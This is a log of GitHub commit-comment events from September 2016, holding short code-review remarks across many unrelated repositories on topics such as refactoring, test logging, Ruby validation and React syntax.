{"id":"4551019144","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":18989340,"position":null,"line":null,"path":null,"commit_id":"1825f6f680bf3259a0bd5f25dc6ad7d24c3d1b9c","created_at":"2016-09-12T18:26:55Z","updated_at":"2016-09-12T18:26:55Z","body":"Nice to see this work! A lot of potential for restructuring. For now, the change that should be done is move the opnsense-auth script to the core.git for future enhancement. I will take care of the rest when I'm back, though all of that will be purely cosmetic. 😊"}},"created_at":"2016-09-12T18:26:55Z"}
{"id":"4551024791","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AnnekathrinvH/express-project"},"payload":{"comment":{"id":18989351,"position":6,"line":97,"path":"index.js","commit_id":"a9ae193e21e34f3f62188e0a81a5733324e05faa","created_at":"2016-09-12T18:27:55Z","updated_at":"2016-09-12T18:27:55Z","body":"Ok, I have some refactoring suggestions! I think that within functions.js the functions are well separated - they are focused on their specific things, the individual tasks are clearly indicated by function names, etc. Where I think the separation can be improved is between index.js and functions.js. For example, I think it would be better if all the stuff in this route starting here looked more like this:\r\n\r\n```js\r\nvar userData = {\r\n    first: req.body.first.toUpperCase(),\r\n    last: req.body.last.toUpperCase(),\r\n    email: req.body.email.toUpperCase(),\r\n    password: password\r\n};\r\nmyFunctions.registerUser(userData, function(err, dbId) {\r\n    if (err) {\r\n         res.redirect('/getaname');\r\n    } else {\r\n        userData.dbId = dbId;\r\n        req.session.userData = userData;\r\n        res.redirect('/moreUserData');\r\n    }\r\n});\r\n```\r\n\r\nThat is, I would abstract out of this route all of the database stuff. The function I am calling `registerUser` can hash the password, and do the insert. The route can just be concerned with extracting parameters from the request, adding stuff to `req.session`, and sending a response. That would mean that if we ever want to register a user from a different route or from something that is not a route at all we would already have a function to do it.\r\n\r\nSimilarly, I'd suggest not passing `req` and `res` to `getData` in functions.js. I'd suggest having `getData` just return data and let the callback passed to it send it in a response or do whatever it wants with it. Dealing with the `req` and `res` can be left to be the responsibility of the relevant route, nobody else needs to know anything about it. The less context we import into individual functions, the more situations they can be reused in.\r\n\r\n"}},"created_at":"2016-09-12T18:27:55Z"}
{"id":"4551026139","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18989352,"position":null,"line":null,"path":null,"commit_id":"0247aa65275b8b3f505fd29044f3a0d4f14c26ba","created_at":"2016-09-12T18:28:11Z","updated_at":"2016-09-12T18:28:11Z","body":"I don't have an answer to that, yet; I made this as a conversation starter! Two questions I was trying to address:\r\n - How can we shorten the feedback loop to students?\r\n - How can the feedback we give positively emphasize _progress_?\r\n\r\nIt would be very cool, for example, to experiment with running the parser + well-formedness checker in real-time. That might shorten the feedback loop (but not by much since parsing and well-formedness checking isn't fast). Even if it were possible, it would probably fail to positively emphasize progress: would it be useful to report parse errors in the middle of typing a keyword? At bet it would be distracting; at worst, misleading.\r\n\r\nThis demo shortens the feedback loop by providing a low-effort pat-on-the-back that something worked. To positively emphasize progress, it leverages three truthy-isms:\r\n - Running tests frequently is good.\r\n - Writing more tests is good.\r\n - Having tests pass is good.\r\n\r\nRunning tests frequently is encouraged with an exciting effect. Writing _more_ tests is encouraged because each test the student writes has the _potential_ to make the effect more exciting. Having tests pass is encouraged because only _passing_ tests contribute to the effect. (Assuming the student is developing the program iteratively, the \"first time they hit run\" is actually quite boring!)\r\n\r\nI think as a basic rule-of-thumb, any purely decorative effects should have an 'off' button."}},"created_at":"2016-09-12T18:28:11Z"}
{"id":"4551028029","type":"CommitCommentEvent","actor":{"login":"newluck77"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18989357,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T18:28:30Z","updated_at":"2016-09-12T18:28:30Z","body":"I'm chewing on something: \r\n\r\n> The first time the callback is called, previousValue and currentValue can be one of two values. If initialValue is provided in the call to reduce, then previousValue will be equal to initialValue and currentValue will be equal to the first value in the array. If no initialValue was provided, then previousValue will be equal to the first value in the array and currentValue will be equal to the second.\r\n[Source](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce#Description)\r\n\r\nIs the empty bracket the `initialValue`? Otherwise `currentValue` would be `\"brown\"`, wouldn't it?"}},"created_at":"2016-09-12T18:28:30Z"}
{"id":"4551030424","type":"CommitCommentEvent","actor":{"login":"ampli"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18989364,"position":5,"line":117,"path":"link-grammar/api.c","commit_id":"59935f88a34c294356f61eb95539ff9bdbb37d98","created_at":"2016-09-12T18:28:55Z","updated_at":"2016-09-12T18:28:55Z","body":"It should be a parse option so the application will be able to increase it for panic mode parsing.\r\nOtherwise, how panic mode parsing can be implemented?"}},"created_at":"2016-09-12T18:28:55Z"}
{"id":"4551030430","type":"CommitCommentEvent","actor":{"login":"daniel-j-born"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":18989363,"position":4,"line":743,"path":"src/core/lib/iomgr/tcp_server_posix.c","commit_id":"9275d4067cfd9233edf2ae9a0fe1255c8c730f19","created_at":"2016-09-12T18:28:55Z","updated_at":"2016-09-12T18:28:55Z","body":"You're right about the shutdown bit. I missed that part.\r\n"}},"created_at":"2016-09-12T18:28:55Z"}
{"id":"4551031046","type":"CommitCommentEvent","actor":{"login":"aliciatb"},"repo":{"name":"socrata/odn-backend"},"payload":{"comment":{"id":18989366,"position":null,"line":null,"path":null,"commit_id":"82abb68aef1ed762731dd2dd6714d87b55fa3772","created_at":"2016-09-12T18:29:02Z","updated_at":"2016-09-12T18:29:02Z","body":"Hi @aaasen, does the presence of this workflow break the build? If I don't run it within this directory, it returns error -\r\n```\r\nSystemCaller: Executing `/usr/local/bin/node /Users/alicia.brown/repos/odn-backend/data/process/variables.js finance.michigan_debt /Users/alicia.brown/data/finance-michigan_debt.csv'\r\nfs.js:634\r\n  return binding.open(pathModule._makeLong(path), stringToFlags(flags), mode);\r\n                 ^\r\n\r\nError: ENOENT: no such file or directory, open 'data/uncapitalized.json'\r\n    at Error (native)\r\n    at Object.fs.openSync (fs.js:634:18)\r\n    at Object.fs.readFileSync (fs.js:502:33)\r\n    at Object.<anonymous> (/Users/alicia.brown/repos/odn-backend/app/name.js:17:30)\r\n    at Module._compile (module.js:541:32)\r\n    at Object.Module._extensions..js (module.js:550:10)\r\n    at Module.load (module.js:458:32)\r\n    at tryModuleLoad (module.js:417:12)\r\n    at Function.Module._load (module.js:409:3)\r\n    at Module.require (module.js:468:17)\r\n```\r\n Though maybe there's a better way to read sources.json to know what variables files need to be created."}},"created_at":"2016-09-12T18:29:02Z"}
{"id":"4551031226","type":"CommitCommentEvent","actor":{"login":"fgasperij"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989367,"position":5,"line":80,"path":"resources/planwise/plpgsql/functions.sql","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T18:29:04Z","updated_at":"2016-09-12T18:29:04Z","body":"In this case I also can't see why this would help, absolute value again."}},"created_at":"2016-09-12T18:29:04Z"}
{"id":"4551033340","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18989371,"position":5,"line":26,"path":"package.json","commit_id":"fa4011329006cfd92a55713631f5d2bea090692d","created_at":"2016-09-12T18:29:26Z","updated_at":"2016-09-12T18:29:26Z","body":"You might have typed something like `npm install npm install` to add these two packages to your dependencies list. You should remove the `install` and `npm` dependencies by typing:\r\n\r\n    npm uninstall --save install npm"}},"created_at":"2016-09-12T18:29:26Z"}
{"id":"4551036296","type":"CommitCommentEvent","actor":{"login":"dimayakovlev"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":18989377,"position":null,"line":null,"path":null,"commit_id":"804ca7d997df11c35f93f03c6ce0112ae0f34488","created_at":"2016-09-12T18:29:57Z","updated_at":"2016-09-12T18:29:57Z","body":"Now website.xml can store manually added data!"}},"created_at":"2016-09-12T18:29:57Z"}
{"id":"4551037777","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul20042005"},"payload":{"comment":{"id":18989384,"position":null,"line":null,"path":null,"commit_id":"aef8ed69f0ca14554826ded5fb6fa867f84ae785","created_at":"2016-09-12T18:30:16Z","updated_at":"2016-09-12T18:30:16Z","body":"hhergwkfhddfwjfduiewhfjdwiuerhfjdiu"}},"created_at":"2016-09-12T18:30:16Z"}
{"id":"4551041022","type":"CommitCommentEvent","actor":{"login":"paasim"},"repo":{"name":"paasim/glmproj"},"payload":{"comment":{"id":18989390,"position":7,"line":15,"path":"R/misc.R","commit_id":"1461b23c3b1e9e27b16fec332609ec951db047ce","created_at":"2016-09-12T18:30:48Z","updated_at":"2016-09-12T18:30:48Z","body":"In the rare case that someone has not loaded and attached rstanarm, but would call it using rstanarm::stan_glm(...), as.character(fit$call[1]) would return rstanarm::stan_glm, which means that varsel wouldn't work. Then again, I don't know if that really is a problem.  \r\n\r\nAlso, apologies for making a rather big change in just one commit which makes this a bit inconvenient."}},"created_at":"2016-09-12T18:30:48Z"}
{"id":"4551041701","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":18989391,"position":null,"line":null,"path":null,"commit_id":"1825f6f680bf3259a0bd5f25dc6ad7d24c3d1b9c","created_at":"2016-09-12T18:30:56Z","updated_at":"2016-09-12T18:30:56Z","body":"@fichtner I was a bit in doubt about this one, because of the hard-coded dependency, although I agree that extending from core.git is more practical. I'll move it to core."}},"created_at":"2016-09-12T18:30:56Z"}
{"id":"4551041718","type":"CommitCommentEvent","actor":{"login":"panchicore"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":18989392,"position":22,"line":22,"path":"hypermap/aggregator/tests/test_arcgis.py","commit_id":"a010ead368f985bd833f422149bcd926c9d3fd11","created_at":"2016-09-12T18:30:56Z","updated_at":"2016-09-12T18:30:56Z","body":"as `url` is a hardcoded string in that snippet... does not make sense to be assertd; it will always pass."}},"created_at":"2016-09-12T18:30:56Z"}
{"id":"4551042739","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989394,"position":14,"line":66,"path":"bayesian_test.go","commit_id":"e9ec2f7e497cecd3ea2d06bcc18fbd55c900191f","created_at":"2016-09-12T18:31:07Z","updated_at":"2016-09-12T18:31:07Z","body":"Tests should not output anything. All the `fmt.Printf` calls should be replaced with `t.Logf`."}},"created_at":"2016-09-12T18:31:07Z"}
{"id":"4551044987","type":"CommitCommentEvent","actor":{"login":"Swyter"},"repo":{"name":"tldmod/tldmod"},"payload":{"comment":{"id":18989398,"position":20,"line":98,"path":"ModuleSystem/module_info_pages.py","commit_id":"583b7b1c537c6cbfed8e9772fe9757f03d650cd3","created_at":"2016-09-12T18:31:29Z","updated_at":"2016-09-12T18:31:29Z","body":"@khamukkamu There's some typos here."}},"created_at":"2016-09-12T18:31:29Z"}
{"id":"4551048920","type":"CommitCommentEvent","actor":{"login":"aaasen"},"repo":{"name":"socrata/odn-backend"},"payload":{"comment":{"id":18989404,"position":null,"line":null,"path":null,"commit_id":"82abb68aef1ed762731dd2dd6714d87b55fa3772","created_at":"2016-09-12T18:32:10Z","updated_at":"2016-09-12T18:32:10Z","body":"I don't want FME workflows to be under version control so I deleted this one. The `variables.js` script must be run from the root directory of the project so that it can find the necessary data files."}},"created_at":"2016-09-12T18:32:10Z"}
{"id":"4551054436","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18989416,"position":61,"line":61,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T18:33:05Z","updated_at":"2016-09-12T18:33:05Z","body":"But most of our labels are based on location rather than purpose. It's not clear where `selectionButtons` go but I know that `actionBarButtons` are on the action bar."}},"created_at":"2016-09-12T18:33:05Z"}
{"id":"4551056092","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989421,"position":213,"line":121,"path":"bayesian_test.go","commit_id":"fa96da598bf7797a8369821acc462e20e37d1915","created_at":"2016-09-12T18:33:22Z","updated_at":"2016-09-12T18:33:22Z","body":"Should never use the print builtins like this. Normally you should use `fmt.Println` instead but in tests use `t.Log` instead."}},"created_at":"2016-09-12T18:33:22Z"}
{"id":"4551064346","type":"CommitCommentEvent","actor":{"login":"paasim"},"repo":{"name":"paasim/glmproj"},"payload":{"comment":{"id":18989444,"position":9,"line":17,"path":"R/misc.R","commit_id":"1461b23c3b1e9e27b16fec332609ec951db047ce","created_at":"2016-09-12T18:34:51Z","updated_at":"2016-09-12T18:34:51Z","body":"At some point I probably had an idea why I'd like to return then as strings but now that I think about it, it is probably just simpler to do it the way you described. "}},"created_at":"2016-09-12T18:34:51Z"}
{"id":"4551066696","type":"CommitCommentEvent","actor":{"login":"eownis"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18989450,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T18:35:16Z","updated_at":"2016-09-12T18:35:16Z","body":"What ?"}},"created_at":"2016-09-12T18:35:16Z"}
{"id":"4551075133","type":"CommitCommentEvent","actor":{"login":"panchicore"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":18989463,"position":32,"line":32,"path":"hypermap/aggregator/tests/test_arcgis.py","commit_id":"a010ead368f985bd833f422149bcd926c9d3fd11","created_at":"2016-09-12T18:36:45Z","updated_at":"2016-09-12T18:36:45Z","body":"unussed `Service.objects.all().delete()` The setUp and tearDown methods are run before and after every `test_***` respectively. "}},"created_at":"2016-09-12T18:36:45Z"}
{"id":"4551079410","type":"CommitCommentEvent","actor":{"login":"zhewenw"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18989478,"position":67,"line":53,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T18:37:31Z","updated_at":"2016-09-12T18:37:31Z","body":"I guess more specifically do i need to return the tag with the constant in\nit?\n\nᐧ\n\nOn Mon, Sep 12, 2016 at 10:45 AM, Zhewen Wang <zhewenw@usc.edu> wrote:\n\n> I tried to do this but it gives the following error:\n>\n> vendor.js:1296 Warning: Unknown prop `props` on <input> tag. Remove this\n> prop from the element. For details, see\n> ᐧ\n>\n> On Sat, Sep 10, 2016 at 3:05 PM, Adam Wexler <notifications@github.com>\n> wrote:\n>\n>> Rather than wrapping your attributes onto multiple lines, you can do\n>> something like this:\n>>\n>> function renderInput() {\n>>   const props = {\n>>     type: 'text',\n>>     ref: 'textinput',\n>>     placeholder: 'Title Here',\n>>     value: this.state.keyword,\n>>     onChange: this.handleChange,\n>>   };\n>> }\n>>\n>> Then, you can replace this whole element with:\n>>\n>> {this.renderInput()}\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_zhewenw_react-2Dstarter_commit_c9be8d8481a246f5d18c281876413d3419eb1983-23commitcomment-2D18975173&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=j2Y73wQVk8YtrfCGv2SHWTZ-O3Zmp03s9V_Nt9pgPTA&s=FhiEjSlAzFcBomiSy2cUy-zDEXYd0ouJWmrgX8huWRY&e=>,\n>> or mute the thread\n>> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AKDN8lyWQsRQMMBQOVkv-2D9wLXtrGdVw2ks5qoymOgaJpZM4J51s4&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=j2Y73wQVk8YtrfCGv2SHWTZ-O3Zmp03s9V_Nt9pgPTA&s=YeZ71l5JiCsFG_nTi1UhgZm-VIKO6Duejb-tkO368eI&e=>\n>> .\n>>\n>\n>\n>\n> --\n> Sincerely,\n>\n> Jason Wang\n> *University of Southern California '17 *\n>\n\n\n\n-- \nSincerely,\n\nJason Wang\n*University of Southern California '17 *\n"}},"created_at":"2016-09-12T18:37:31Z"}
{"id":"4551081698","type":"CommitCommentEvent","actor":{"login":"AndreVepreve"},"repo":{"name":"AndreVepreve/Coursera"},"payload":{"comment":{"id":18989483,"position":null,"line":null,"path":null,"commit_id":"63d04d947217ea1d8d3c936136eb579de9a21c90","created_at":"2016-09-12T18:37:56Z","updated_at":"2016-09-12T18:37:56Z","body":"rollback"}},"created_at":"2016-09-12T18:37:56Z"}
{"id":"4551085138","type":"CommitCommentEvent","actor":{"login":"puremourning"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18989493,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-12T18:38:32Z","updated_at":"2016-09-12T18:38:32Z","body":"strange backtrace:\r\n\r\n```85_AcceptSelection..webdevicons#ctrlPOpenFunc..ctrlp#acceptfile```\r\n\r\nWhat plugin is that? Could it be an incompatibility with yCM?"}},"created_at":"2016-09-12T18:38:32Z"}
{"id":"4551087639","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18989501,"position":44,"line":33,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T18:39:00Z","updated_at":"2016-09-12T18:39:00Z","body":"This syntax is used as a replacement for using `bind` in the constructor. I would not use it unless you needed to bind `this` to your function."}},"created_at":"2016-09-12T18:39:00Z"}
{"id":"4551088042","type":"CommitCommentEvent","actor":{"login":"ekclifford"},"repo":{"name":"BSwear/BSwearPlus"},"payload":{"comment":{"id":18989503,"position":null,"line":null,"path":null,"commit_id":"66dc9b4a7ecde5681133cbf0f73b2819fd4e33e2","created_at":"2016-09-12T18:39:05Z","updated_at":"2016-09-12T18:39:05Z","body":"That is true for your other plugin....  But not in this coding context.  The \".substring(1)\" is the \"/\" in the code.  It's saying its a command so ignore the \"/\" and go straight to the command sent."}},"created_at":"2016-09-12T18:39:05Z"}
{"id":"4551090253","type":"CommitCommentEvent","actor":{"login":"emilyashley"},"repo":{"name":"MapStory/mapstory-geonode"},"payload":{"comment":{"id":18989510,"position":null,"line":null,"path":null,"commit_id":"33942cc854ae5ae6c05279a420d6d880e842c3a8","created_at":"2016-09-12T18:39:28Z","updated_at":"2016-09-12T18:39:28Z","body":"Stashed initiatives in theme-dependent extended index\r\n\r\nExplore: \r\nImplemented _sidebar_best of to showcase selected search methods\r\nOrder by popular/newest above search results \r\n\r\nLayer Detail: \r\nChange Edit Metadata to Update Metadata in User Actions\r\nChange Topic to Category. Remove Time Range. Remove Language\r\nLeft justified title and actions\r\n\r\nViewer: fix zoom buttons from getting kicked off map\r\n\r\nChange all references to Upload Layer to Import Layer…"}},"created_at":"2016-09-12T18:39:28Z"}
{"id":"4551091952","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18989514,"position":8,"line":8,"path":"lesson6/carriage.rb","commit_id":"aa2445680e53615ae4b83621f9cc7f379f7c75af","created_at":"2016-09-12T18:39:47Z","updated_at":"2016-09-12T18:39:47Z","body":"Нужно вызывать метод validate! в конструкторе, чтобы не создавать невалидные экземпляры"}},"created_at":"2016-09-12T18:39:47Z"}
{"id":"4551093774","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18989522,"position":29,"line":13,"path":"app/views/trains/_form.html.erb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T18:40:08Z","updated_at":"2016-09-12T18:40:08Z","body":"Да, мне приходила в голову такая мысль, но я попробовал сделать это с помощью опции `prompt` для `collection_select` и у меня не получилось. Оказалось, что для этого есть опция `include_blank`. "}},"created_at":"2016-09-12T18:40:08Z"}
{"id":"4551093953","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18989526,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T18:40:11Z","updated_at":"2016-09-12T18:40:11Z","body":"I tried again with the 25/25 solution. With `creep.data.targetId = null;` at each `NO PATH` it's running slightly better, but not completely smooth. I think we should stick to the current implementation for the moment. There is so much work and this solution seems to be working. We can give it a second try later. (maybe with pathfinder)"}},"created_at":"2016-09-12T18:40:11Z"}
{"id":"4551097009","type":"CommitCommentEvent","actor":{"login":"wkentdag"},"repo":{"name":"static-dev/spike-tpl-base"},"payload":{"comment":{"id":18989535,"position":null,"line":null,"path":null,"commit_id":"ffc5de2994f400bc03be7bea07a34047d6666a00","created_at":"2016-09-12T18:40:42Z","updated_at":"2016-09-12T18:40:42Z","body":"💪 "}},"created_at":"2016-09-12T18:40:42Z"}
{"id":"4551097278","type":"CommitCommentEvent","actor":{"login":"okan"},"repo":{"name":"sausozluk/web"},"payload":{"comment":{"id":18989536,"position":null,"line":null,"path":null,"commit_id":"ffab38d230edcc2c63a6eb956d7daf55949cd79c","created_at":"2016-09-12T18:40:44Z","updated_at":"2016-09-12T18:40:44Z","body":"<3"}},"created_at":"2016-09-12T18:40:44Z"}
{"id":"4551098629","type":"CommitCommentEvent","actor":{"login":"4kito"},"repo":{"name":"4kito/GPXSimplify"},"payload":{"comment":{"id":18989539,"position":40,"line":40,"path":"GPXSimplifier.js","commit_id":"3288d9747e878d6f6dc9bde5704a99f49185115e","created_at":"2016-09-12T18:40:59Z","updated_at":"2016-09-12T18:40:59Z","body":"J'ai un problème ici, je n'arrive pas à sortir du parsing du fichier, j'ai essayé beaucoup de solutions dont pause(), close(), return etc... Et je n'arrive pas à arrêter la loop quand je le souhaite du coup à cause de mon check !line.includes(\"time\") je ne prends pas la ligne time dans le header"}},"created_at":"2016-09-12T18:40:59Z"}
{"id":"4551099565","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18989544,"position":1,"line":1,"path":"lesson6/carriage.rb","commit_id":"aa2445680e53615ae4b83621f9cc7f379f7c75af","created_at":"2016-09-12T18:41:10Z","updated_at":"2016-09-12T18:41:10Z","body":"А с чего вдруг вагон стал подклассом поезда. Разве вагон - это частный случай поезда? Если это только для того, чтобы использовать константу из Train, то наследование здесь не нужно, можно напрямую обратиться к константе из любого класса, если она публичная. "}},"created_at":"2016-09-12T18:41:10Z"}
{"id":"4551106288","type":"CommitCommentEvent","actor":{"login":"4kito"},"repo":{"name":"4kito/GPXSimplify"},"payload":{"comment":{"id":18989560,"position":58,"line":58,"path":"GPXSimplifier.js","commit_id":"3288d9747e878d6f6dc9bde5704a99f49185115e","created_at":"2016-09-12T18:42:25Z","updated_at":"2016-09-12T18:42:25Z","body":"Tous les *100 sont là car je n'ai pas implémenté la transformation de coordonées sphériques en coordonées cartésiennes, il faut que je code les fonctions de projection orthogonale pour avoir le résultat le plus juste possible"}},"created_at":"2016-09-12T18:42:25Z"}
{"id":"4551106393","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18989562,"position":38,"line":38,"path":"lesson6/route.rb","commit_id":"aa2445680e53615ae4b83621f9cc7f379f7c75af","created_at":"2016-09-12T18:42:26Z","updated_at":"2016-09-12T18:42:26Z","body":"start_station и end_station - это не названия, это объекты. Поэтому здесь можно валидировать только их наличие и то, что это объекты нужного класса. А длину и формат названия станции должен валидировать класс Station"}},"created_at":"2016-09-12T18:42:26Z"}
{"id":"4551107081","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"jbrukh/bayesian"},"payload":{"comment":{"id":18989563,"position":5,"line":385,"path":"bayesian.go","commit_id":"48a9f6457f0732ee55466f94a27aaa425c360e8d","created_at":"2016-09-12T18:42:32Z","updated_at":"2016-09-12T18:42:32Z","body":"Unless you have a very specific use case, this should be `0666`, its up to the user/process \"umask\" to determine if they want files group/world read/writable. Also, there should be `os.O_TRUNC' otherwise it won't work as expected for existing files.\r\n\r\nWith those points in mind this should just be `os.Create` instead of `os.OpenFile`."}},"created_at":"2016-09-12T18:42:32Z"}
{"id":"4551108761","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18989566,"position":13,"line":13,"path":"lesson6/station.rb","commit_id":"aa2445680e53615ae4b83621f9cc7f379f7c75af","created_at":"2016-09-12T18:42:51Z","updated_at":"2016-09-12T18:42:51Z","body":"Валидацию надо вызывать до того, как помещаешь объект в массив, иначе там будут невалидные объекты"}},"created_at":"2016-09-12T18:42:51Z"}
{"id":"4551108964","type":"CommitCommentEvent","actor":{"login":"panchicore"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":18989568,"position":50,"line":50,"path":"hypermap/aggregator/tests/test_arcgis.py","commit_id":"a010ead368f985bd833f422149bcd926c9d3fd11","created_at":"2016-09-12T18:42:53Z","updated_at":"2016-09-12T18:42:53Z","body":"as the url is a remote service, what guarantees always will be resulting on 5 services created? what means if only 1 created? or 6?"}},"created_at":"2016-09-12T18:42:53Z"}
{"id":"4551111070","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18989576,"position":53,"line":42,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T18:43:17Z","updated_at":"2016-09-12T18:43:17Z","body":"Fat arrow (`=>`) functions don't need to be wrapped in brackets and they implicitly return if they are only 1 line long. In other words, this is functionally equivalent:\r\n\r\n    renderResult = (item, i) => {\r\n      return <button key={i}>{item.Title}</button>;\r\n    }\r\n\r\nThe reason I didn't use that syntax is because of eslint, they say that if your function in only 1 line long that you can strip off the brackets. So really, this is also the same:\r\n\r\n    renderResult = (item, i) => <button key={i}>{item.Title}</button>;"}},"created_at":"2016-09-12T18:43:17Z"}
{"id":"4551112638","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18989582,"position":17,"line":17,"path":"lesson6/train.rb","commit_id":"aa2445680e53615ae4b83621f9cc7f379f7c75af","created_at":"2016-09-12T18:43:35Z","updated_at":"2016-09-12T18:43:35Z","body":"Видимо, я пропустил в прошлый раз. У тебя тут сравнение (==), а должно быть присваивание (=)"}},"created_at":"2016-09-12T18:43:35Z"}
{"id":"4551115333","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18989598,"position":4,"line":10,"path":"app/views/layouts/application.html.erb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T18:44:06Z","updated_at":"2016-09-12T18:44:06Z","body":"Да, так, конечно, правильнее. В вёрстке, откуда я родом, так и делается -- вся разметка и стили бьются на блоки и хранятся отдельно."}},"created_at":"2016-09-12T18:44:06Z"}
{"id":"4551122152","type":"CommitCommentEvent","actor":{"login":"4kito"},"repo":{"name":"4kito/GPXSimplify"},"payload":{"comment":{"id":18989612,"position":73,"line":73,"path":"GPXSimplifier.js","commit_id":"3288d9747e878d6f6dc9bde5704a99f49185115e","created_at":"2016-09-12T18:45:21Z","updated_at":"2016-09-12T18:45:21Z","body":"Je n'ai pas pu vérifier si la date que toISOString() me renvoie est considérée comme valide dans le GPX sachant que le fichier GPX que j'utilise pour tester donne : <time>2016-08-27T07:24:44Z</time> et quand je récupère cette date et la retransforme j'ai : <time>2016-08-27T07:24:44.000Z</time>"}},"created_at":"2016-09-12T18:45:21Z"}
{"id":"4551123447","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"paasim/glmproj"},"payload":{"comment":{"id":18989619,"position":7,"line":15,"path":"R/misc.R","commit_id":"1461b23c3b1e9e27b16fec332609ec951db047ce","created_at":"2016-09-12T18:45:35Z","updated_at":"2016-09-12T18:45:35Z","body":"Good point. Leaving it as you have it is fine. Or something like this should also work regardless of how the function was called: \r\n```r\r\ngsub(\"rstanarm::\", \"\", as.character(fit$call[1])) %in% c(\"stan_glm\", \"stan_lm\")\r\n```"}},"created_at":"2016-09-12T18:45:35Z"}
{"id":"4551124710","type":"CommitCommentEvent","actor":{"login":"ManuelDeLeon"},"repo":{"name":"joeduncan/enzyme"},"payload":{"comment":{"id":18989622,"position":null,"line":null,"path":null,"commit_id":"26c155becae9111a95a5aa2c09a27134161bce0a","created_at":"2016-09-12T18:45:47Z","updated_at":"2016-09-12T18:45:47Z","body":"It doesn't match: \r\n```\r\n.a[b=\"c\"]\r\na.b[c=\"d\"]\r\na.b-c\r\n```\r\n\r\nWhat's wrong with `/^[\\.#]?-?[_a-z]+[_a-z0-9-]*[\\.\\[#]/i`?\r\n\r\nI acknowledge that it can return true for a malformed selector but is it any worse than the alternative: for the regex test to say \"I've parsed this (malformed) selector and I can tell you it is not compound.\" They're both wrong so we might as well go with the simpler one."}},"created_at":"2016-09-12T18:45:47Z"}
